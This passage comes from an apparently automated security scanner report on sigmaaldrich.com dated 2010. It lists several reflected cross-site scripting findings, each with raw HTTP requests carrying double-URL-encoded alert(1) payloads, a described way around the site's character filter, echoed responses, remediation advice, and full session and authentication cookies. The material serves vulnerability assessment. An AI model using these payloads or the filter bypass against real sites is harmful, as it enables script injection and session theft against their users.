Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:30 GMT
Content-Length: 28942
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc4905f";alert(1)//4f88a8734e2/medialib/logos/sigma-aldrich-logo0","E404") ;
   </script>
...[SNIP]...

1.414. http://www.sigmaaldrich.com/etc/medialib/logos/sigma-aldrich-logo0 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/sigma-aldrich-logo0

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f03cd%2522%253balert%25281%2529%252f%252fba6c693ffba was submitted in the REST URL parameter 2. This input was echoed as f03cd";alert(1)//ba6c693ffba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibf03cd%2522%253balert%25281%2529%252f%252fba6c693ffba/logos/sigma-aldrich-logo0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:32 GMT
Content-Length: 28942
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibf03cd";alert(1)//ba6c693ffba/logos/sigma-aldrich-logo0","E404") ;
   </script>
...[SNIP]...

1.415. http://www.sigmaaldrich.com/etc/medialib/logos/sigma-aldrich-logo0 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/sigma-aldrich-logo0

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c3b2%2522%253balert%25281%2529%252f%252f69600188367 was submitted in the REST URL parameter 3. This input was echoed as 7c3b2";alert(1)//69600188367 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/logos7c3b2%2522%253balert%25281%2529%252f%252f69600188367/sigma-aldrich-logo0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:34 GMT
Content-Length: 28942
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/logos7c3b2";alert(1)//69600188367/sigma-aldrich-logo0","E404") ;
   </script>
...[SNIP]...

1.416. http://www.sigmaaldrich.com/etc/medialib/logos/sigma-aldrich-logo0 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/sigma-aldrich-logo0

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5d78%2522%253balert%25281%2529%252f%252f95081fe8cd7 was submitted in the REST URL parameter 4. This input was echoed as f5d78";alert(1)//95081fe8cd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/logos/sigma-aldrich-logo0f5d78%2522%253balert%25281%2529%252f%252f95081fe8cd7 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:36 GMT
Content-Length: 28942
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/logos/sigma-aldrich-logo0f5d78";alert(1)//95081fe8cd7","E404") ;
   </script>
...[SNIP]...

1.417. http://www.sigmaaldrich.com/etc/medialib/logos/small-signup-icon [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/small-signup-icon

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35d34%2522%253balert%25281%2529%252f%252fddc4842eea0 was submitted in the REST URL parameter 1. This input was echoed as 35d34";alert(1)//ddc4842eea0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc35d34%2522%253balert%25281%2529%252f%252fddc4842eea0/medialib/logos/small-signup-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:27 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc35d34";alert(1)//ddc4842eea0/medialib/logos/small-signup-icon","E404") ;
   </script>
...[SNIP]...

1.418. http://www.sigmaaldrich.com/etc/medialib/logos/small-signup-icon [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/small-signup-icon

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e093%2522%253balert%25281%2529%252f%252f546f4c6ebec was submitted in the REST URL parameter 2. This input was echoed as 8e093";alert(1)//546f4c6ebec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib8e093%2522%253balert%25281%2529%252f%252f546f4c6ebec/logos/small-signup-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
